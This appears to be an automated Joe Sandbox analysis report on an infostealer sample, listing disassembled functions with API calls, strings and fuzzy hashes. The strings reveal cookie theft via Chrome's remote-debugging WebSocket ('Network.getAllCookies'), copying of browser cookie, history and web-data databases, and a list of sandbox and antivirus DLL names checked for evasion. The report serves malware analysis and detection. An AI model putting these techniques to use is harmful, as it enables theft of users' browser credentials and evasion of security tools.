APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00B191EE,?,?,00000000,00000000,00000000,?), ref: 00B19312

Strings

RCC, xrefs: 00B1932C
MOC, xrefs: 00B19324

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 04eacceaa53b075a51be437ce15027c28e9feeb13bb559903d21d417fb650fad
Instruction ID: 92bc2734865f894912f26348dcf254c4b7b12439b72bb99f19e072b175d99975
Opcode Fuzzy Hash: 04eacceaa53b075a51be437ce15027c28e9feeb13bb559903d21d417fb650fad
Instruction Fuzzy Hash: C6417931900249EFDF16DF94D981AEE7BF5FF48300F5880A9F91567251D335A991CB50

Function 00B18B59 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00B18DD0

Strings

csm, xrefs: 00B18DF2
csm, xrefs: 00B18E63

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: c8c8813a26338c35ed2120ce93fdcb098fa8f73dc39a26c88e1f846bf7393e97
Instruction ID: 4ad4e105f19cb2fbf6d6f482ca7782bb0cf7916fa7bf300131c958d92566196a
Opcode Fuzzy Hash: c8c8813a26338c35ed2120ce93fdcb098fa8f73dc39a26c88e1f846bf7393e97
Instruction Fuzzy Hash: 2F319233800218DBCF269F54CC849FA7BA6FF09715B9845D9F85449261CB32DCE1DB91

Analysis Process: c2bea0d661.exePID: 4876, Parent PID: 8028COMMON

Execution Graph

Execution Coverage:	14.1%
Dynamic/Decrypted Code Coverage:	14.2%
Signature Coverage:	0.7%
Total number of Nodes:	1604
Total number of Limit Nodes:	35

Executed Functions

Function 0040996B Relevance: 62.1, APIs: 28, Strings: 7, Instructions: 841networkstringCOMMON

Download Yara Rule

APIs

Part of subcall function 004123CA: memcpy.MSVCRT(?,00000010,?,?,?,?,00412388,?,?,?,?,?,?,0041234F,?,00000000), ref: 00412417

WSAStartup.WS2_32(00000202,?), ref: 00409BFB
socket.WS2_32(00000002,00000001,00000006), ref: 00409C0B
getaddrinfo.WS2_32(00000000,00000000,?,?), ref: 00409C67
closesocket.WS2_32(00000000), ref: 00409C72
WSACleanup.WS2_32 ref: 00409C78
htons.WS2_32(00000000), ref: 00409CEB
freeaddrinfo.WS2_32(?,?,?,?,00000005,00000001), ref: 00409D03
connect.WS2_32(00000000,?,00000010), ref: 00409D0D
strlen.MSVCRT ref: 00409DBF
memmove.MSVCRT(00000000,00000000,?), ref: 00409E5D
memmove.MSVCRT(?,00000000,?,?,00000000,000000FF), ref: 00409EC4
memmove.MSVCRT(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,006439EB,00403BD8), ref: 00409F4C
memmove.MSVCRT(?,00000000,?,?,00000000,000000FF), ref: 00409FB3

Strings

{"id":1,"method":"Network.getAllCookies"}, xrefs: 0040A2E0
GET , xrefs: 00409D7B, 00409DBA, 00409DDC
ws://, xrefs: 00409A5E
:, xrefs: 00409B40
HTTP/1.1Host: , xrefs: 00409E09, 00409E24
Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: , xrefs: 0040A03D
Sec-WebSocket-Version: 13, xrefs: 0040A184

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: memmove$CleanupStartupclosesocketconnectfreeaddrinfogetaddrinfohtonsmemcpysocketstrlen
String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$GET $ws://${"id":1,"method":"Network.getAllCookies"}
API String ID: 1979669111-4236195153
Opcode ID: 4715123e443adf7437ec88137ba1ca19ecd170733144086bc0f98247ced9646a
Instruction ID: 3f74030779492602d4843865c2cca9a124e88548bb3c48b38f5ca924778076b7
Opcode Fuzzy Hash: 4715123e443adf7437ec88137ba1ca19ecd170733144086bc0f98247ced9646a
Instruction Fuzzy Hash: CA72EF706083809FD324DF24C845BABBBE5BF91304F44492EE0D9973D2DBB89949CB5A

Function 0040B942 Relevance: 59.1, APIs: 23, Strings: 10, Instructions: 1344
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732

Part of subcall function 00413806: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,004074A9,?,?,?,00000014), ref: 00413846
Part of subcall function 00413806: lstrcatA.KERNEL32(00000000,?,?,004074A9,?,?,?,00000014), ref: 00413850

FindFirstFileA.KERNEL32(00000000,?,0042EEFC,0042EEFC,?,?,00643AFF,?,?,0042EEFC), ref: 0040B9F2
DeleteFileA.KERNEL32(00000000,?), ref: 0040BF23
StrCmpCA.SHLWAPI(?), ref: 0040BF51
FindNextFileA.KERNEL32(?,?), ref: 0040C281
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C084

Part of subcall function 00415071: OpenProcess.KERNEL32(00001001,00000000,?), ref: 0041512A
Part of subcall function 00415071: TerminateProcess.KERNEL32(00000000,00000000), ref: 00415139
Part of subcall function 00415071: CloseHandle.KERNEL32(00000000), ref: 00415140

Part of subcall function 0040B4F3: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040B5BB
Part of subcall function 0040B4F3: Sleep.KERNEL32(000003E8,?), ref: 0040B5DE
Part of subcall function 0040B4F3: PathFileExistsA.SHLWAPI(00000000), ref: 0040B5FC
Part of subcall function 0040B4F3: CreateFileA.KERNEL32 ref: 0040B634

StrCmpCA.SHLWAPI(?,?), ref: 0040C4D4
StrCmpCA.SHLWAPI(?), ref: 0040C4E9
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C5AE

Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA

memset.MSVCRT ref: 0040C6DA
lstrcatA.KERNEL32(?,00000000,?), ref: 0040C6F5
lstrcatA.KERNEL32(?,00000000), ref: 0040C70A
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C89C
DeleteFileA.KERNEL32(00000000,?), ref: 0040C9EE
StrCmpCA.SHLWAPI(?), ref: 0040BF66

Part of subcall function 0041797D: Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00417A27
Part of subcall function 0041797D: CreateThread.KERNEL32(00000000,00000000,Function_0001A90D,?,00000000,00000000), ref: 00417A79
Part of subcall function 0041797D: WaitForSingleObject.KERNEL32(00000000,000003E8,?,?,?,?,?,?,?,?,?,?,?,?,004017BD,?), ref: 00417A85

StrCmpCA.SHLWAPI(00000000,Opera GX,?,?,?,?,00643A71,?,?,0042EEFC), ref: 0040BB57

Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763

Part of subcall function 0040AE6D: CreateFileA.KERNEL32 ref: 0040AEA5
Part of subcall function 0040AE6D: GetFileSizeEx.KERNEL32(00000000,?), ref: 0040AEB5
Part of subcall function 0040AE6D: LocalAlloc.KERNEL32(00000040,8BE3897C), ref: 0040AED8
Part of subcall function 0040AE6D: ReadFile.KERNEL32(00000000,EC8350EC,8BE3897C,?,00000000), ref: 0040AEF9
Part of subcall function 0040AE6D: CloseHandle.KERNEL32(00000000), ref: 0040AF1F

StrCmpCA.SHLWAPI(00000000,Brave,?,?,?,00643A71,?,?,00643A71,?,?,?,?,00643A71,?,?), ref: 0040BCC3
FindClose.KERNEL32(?), ref: 0040CC74

Part of subcall function 0040B942: StrCmpCA.SHLWAPI(00000000,00632B48), ref: 0040C2AA
Part of subcall function 0040B942: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C3AA
Part of subcall function 0040B942: Sleep.KERNEL32(000003E8,?), ref: 0040C3CD

Part of subcall function 0040AE6D: LocalFree.KERNEL32(EC8350EC), ref: 0040AF18

memset.MSVCRT ref: 0040CB1C
lstrcatA.KERNEL32(?,00000000), ref: 0040CB37
lstrcatA.KERNEL32(?,00000000), ref: 0040CB4C

Strings

H+c, xrefs: 0040C29A
_webdata.db, xrefs: 0040C92A, 0040C949
--remote-debugging-port=9223 --profile-directory=", xrefs: 0040C75C, 0040CB9E
_cookies.db, xrefs: 0040C430, 0040C45E, 0040CA4E, 0040CA7C
Opera GX, xrefs: 0040BB3B, 0040BB51
Brave, xrefs: 0040BCBD
q:d, xrefs: 0040BC26
_history.db, xrefs: 0040C64A, 0040C669
q:d, xrefs: 0040BC20
q:d, xrefs: 0040BBA1

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: File$lstrcat$Copy$lstrcpy$CloseCreateFindSleep$DeleteHandleLocalProcessmemset$AllocExistsFirstFreeNextObjectOpenPathReadSingleSizeTerminateThreadWaitlstrlen
String ID: --remote-debugging-port=9223 --profile-directory="$Brave$H+c$Opera GX$_cookies.db$_history.db$_webdata.db$q:d$q:d$q:d
API String ID: 94806381-1959957562
Opcode ID: 127a16f1cfdc933f104487545c4dcec3ebf9936fac967d3ae1bbf9b33bcd2fa0
Instruction ID: 174e56ac039bf92636f85ecbebfaea88a4299e227d1b3268452c05c8328876e2
Opcode Fuzzy Hash: 127a16f1cfdc933f104487545c4dcec3ebf9936fac967d3ae1bbf9b33bcd2fa0
Instruction Fuzzy Hash: E9C2E1B5D006599BCB11EF61CC81AEEBBB6FF55308F00411EE41567292DF38AB85CB98

Function 00409EF0 Relevance: 42.6, APIs: 21, Strings: 3, Instructions: 634
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memmove.MSVCRT(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,006439EB,00403BD8), ref: 00409F4C
memmove.MSVCRT(?,00000000,?,?,00000000,000000FF), ref: 00409FB3
memmove.MSVCRT(00000000,00000000,?), ref: 0040A07F

Part of subcall function 00412672: memcpy.MSVCRT(00000010,?,?,?,00000000,?,?,?,?,004098B8,?,?,?,?,?), ref: 004126CB

memmove.MSVCRT(?,00000000,?,?,00000000,000000FF), ref: 0040A0F4
memmove.MSVCRT(00000000,00000000,?,Sec-WebSocket-Version: 13,?,00000000,000000FF), ref: 0040A1B0
send.WS2_32(00000000,00000000,?,00000000), ref: 0040A256
recv.WS2_32(00000000,?,00001000,00000000), ref: 0040A275
rand.MSVCRT ref: 0040A2EA
rand.MSVCRT ref: 0040A2F3
rand.MSVCRT ref: 0040A2FC
rand.MSVCRT ref: 0040A305
closesocket.WS2_32(00000000), ref: 0040A344
WSACleanup.WS2_32 ref: 0040A34A

Part of subcall function 0041232C: strlen.MSVCRT ref: 0041233A

send.WS2_32(?,?,?,00000000), ref: 0040A472

Strings

{"id":1,"method":"Network.getAllCookies"}, xrefs: 0040A2E0
Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: , xrefs: 0040A03D
Sec-WebSocket-Version: 13, xrefs: 0040A184

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: memmove$rand$send$Cleanupclosesocketmemcpyrecvstrlen
String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13${"id":1,"method":"Network.getAllCookies"}
API String ID: 1310494680-79665549
Opcode ID: 2f2b8ba2ae1dd3a92bbe92c89018d6b561798d8129df7c2406b3602540458124
Instruction ID: 7d3f802dacfbc51c16cf9b5c35bd333ed955a40ae5e02f1ce859e471571e4636
Opcode Fuzzy Hash: 2f2b8ba2ae1dd3a92bbe92c89018d6b561798d8129df7c2406b3602540458124
Instruction Fuzzy Hash: 3D32C0706083509FC324DF24C850BABBBE5AF95304F44492EF4D9973C2DB78A949CB9A

Function 0040DE0C Relevance: 30.4, APIs: 5, Strings: 12, Instructions: 619
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732

Part of subcall function 00413806: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,004074A9,?,?,?,00000014), ref: 00413846
Part of subcall function 00413806: lstrcatA.KERNEL32(00000000,?,?,004074A9,?,?,?,00000014), ref: 00413850

FindFirstFileA.KERNEL32(00000000,?,?,?,\*.*,?,?,0042EEFC), ref: 0040DE9F
StrCmpCA.SHLWAPI(00000000,Opera,0042EEFC,0042EEFC,0042EEFC,0042EEFC,0042EEFC,0042EEFC,0042EEFC), ref: 0040DFC0
StrCmpCA.SHLWAPI(00000000,Opera GX), ref: 0040DFFB
StrCmpCA.SHLWAPI(00000000,Opera Crypto), ref: 0040E040

Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA

Part of subcall function 004137C0: lstrcpyA.KERNEL32(00000000,?,?,?,?,004074B1,?,?,?,?,00000014), ref: 004137F8

Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763

Part of subcall function 00414AB3: GetFileAttributesA.KERNEL32(00000000,?,?,?,00401F5C,?,00000000,?,0042EEFC), ref: 00414AC8

FindNextFileA.KERNEL32(?,?), ref: 0040E664

Part of subcall function 0040D820: FindFirstFileA.KERNEL32(00000000,?,?,?,\*.*,0042EEFC), ref: 0040D891

Strings

q:d, xrefs: 0040E323
Opera GX, xrefs: 0040DFDF, 0040DFF5
q:d, xrefs: 0040E24C
q:d, xrefs: 0040E200
\*.*, xrefs: 0040DE67
q:d, xrefs: 0040E080
q:d, xrefs: 0040E164
Opera Crypto, xrefs: 0040E01A, 0040E03A
Opera, xrefs: 0040DFBA
q:d, xrefs: 0040E07A
q:d, xrefs: 0040E1A1
q:d, xrefs: 0040E11E

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: lstrcpy$File$Find$Firstlstrcat$AttributesNextlstrlen
String ID: Opera$Opera Crypto$Opera GX$\*.*$q:d$q:d$q:d$q:d$q:d$q:d$q:d$q:d
API String ID: 3824151033-3007903608
Opcode ID: da345ea911fdbb0c6dedb88d97770686dba92db61566b6d7d4b8b57ada552932
Instruction ID: 85de566a111d5f1e8b18406dd00569acccaa8dec1bf15e5a141765a1f0173e6d
Opcode Fuzzy Hash: da345ea911fdbb0c6dedb88d97770686dba92db61566b6d7d4b8b57ada552932
Instruction Fuzzy Hash: 0432C5B59001189ACF05FF61CC91AEE7B79AF55309F00805EF81567192DF38ABC9CBA8

Function 00401325 Relevance: 25.6, APIs: 6, Strings: 11, Instructions: 104
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcmpiW.KERNEL32(?,avghookx.dll), ref: 0040134A
lstrcmpiW.KERNEL32(?,avghooka.dll), ref: 00401371
lstrcmpiW.KERNEL32(?,snxhk.dll), ref: 00401398
lstrcmpiW.KERNEL32(?,sbiedll.dll), ref: 004013BF
lstrcmpiW.KERNEL32(?,api_log.dll), ref: 004013E6

Part of subcall function 004012ED: lstrcmpiW.KERNEL32(?,?), ref: 00401313

lstrcmpiW.KERNEL32(?,dir_watch.dll), ref: 0040140A

Strings

pstorec.dll, xrefs: 00401412
avghooka.dll, xrefs: 00401369
cmdvrt64.dll, xrefs: 0040144A
sbiedll.dll, xrefs: 004013B7
avghookx.dll, xrefs: 00401342
api_log.dll, xrefs: 004013DE
vmcheck.dll, xrefs: 00401420
dir_watch.dll, xrefs: 00401402
snxhk.dll, xrefs: 00401390
wpespy.dll, xrefs: 0040142E
cmdvrt32.dll, xrefs: 0040143C

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: api_log.dll$avghooka.dll$avghookx.dll$cmdvrt32.dll$cmdvrt64.dll$dir_watch.dll$pstorec.dll$sbiedll.dll$snxhk.dll$vmcheck.dll$wpespy.dll
API String ID: 1586166983-3272603366
Opcode ID: 2a1f5ce9f70cf23b1a530eb2306dab1fc1f0e01b606b30518bff8843f3dffdcc
Instruction ID: 883fd4d78f60abfb3cb12b7bb653628bb47a760653f6edd6bf7d68e1fda7e1b2
Opcode Fuzzy Hash: 2a1f5ce9f70cf23b1a530eb2306dab1fc1f0e01b606b30518bff8843f3dffdcc
Instruction Fuzzy Hash: 3531AD323013909BDB219B4AC9C0B517366AF44B647AA0073D902BB7B7E2B99C41CA1D

Function 0040CCF2 Relevance: 23.5, APIs: 9, Strings: 4, Instructions: 771
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732

Part of subcall function 00413806: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,004074A9,?,?,?,00000014), ref: 00413846
Part of subcall function 00413806: lstrcatA.KERNEL32(00000000,?,?,004074A9,?,?,?,00000014), ref: 00413850

FindFirstFileA.KERNEL32(00000000,?,?,?,00643AFF,?,?,0042EEFC), ref: 0040CD86
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CEC9

Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763

Part of subcall function 0040AE6D: CreateFileA.KERNEL32 ref: 0040AEA5
Part of subcall function 0040AE6D: GetFileSizeEx.KERNEL32(00000000,?), ref: 0040AEB5
Part of subcall function 0040AE6D: LocalAlloc.KERNEL32(00000040,8BE3897C), ref: 0040AED8
Part of subcall function 0040AE6D: ReadFile.KERNEL32(00000000,EC8350EC,8BE3897C,?,00000000), ref: 0040AEF9
Part of subcall function 0040AE6D: CloseHandle.KERNEL32(00000000), ref: 0040AF1F

StrCmpCA.SHLWAPI(?,?,?,?,?,00643A71,?,?,0042EEFC), ref: 0040D107
StrCmpCA.SHLWAPI(?), ref: 0040D11C
StrCmpCA.SHLWAPI(?), ref: 0040D131
StrCmpCA.SHLWAPI(?), ref: 0040D146

Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA

Part of subcall function 0041797D: Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00417A27
Part of subcall function 0041797D: CreateThread.KERNEL32(00000000,00000000,Function_0001A90D,?,00000000,00000000), ref: 00417A79
Part of subcall function 0041797D: WaitForSingleObject.KERNEL32(00000000,000003E8,?,?,?,?,?,?,?,?,?,?,?,?,004017BD,?), ref: 00417A85

FindNextFileA.KERNELBASE(?,?), ref: 0040D7A4
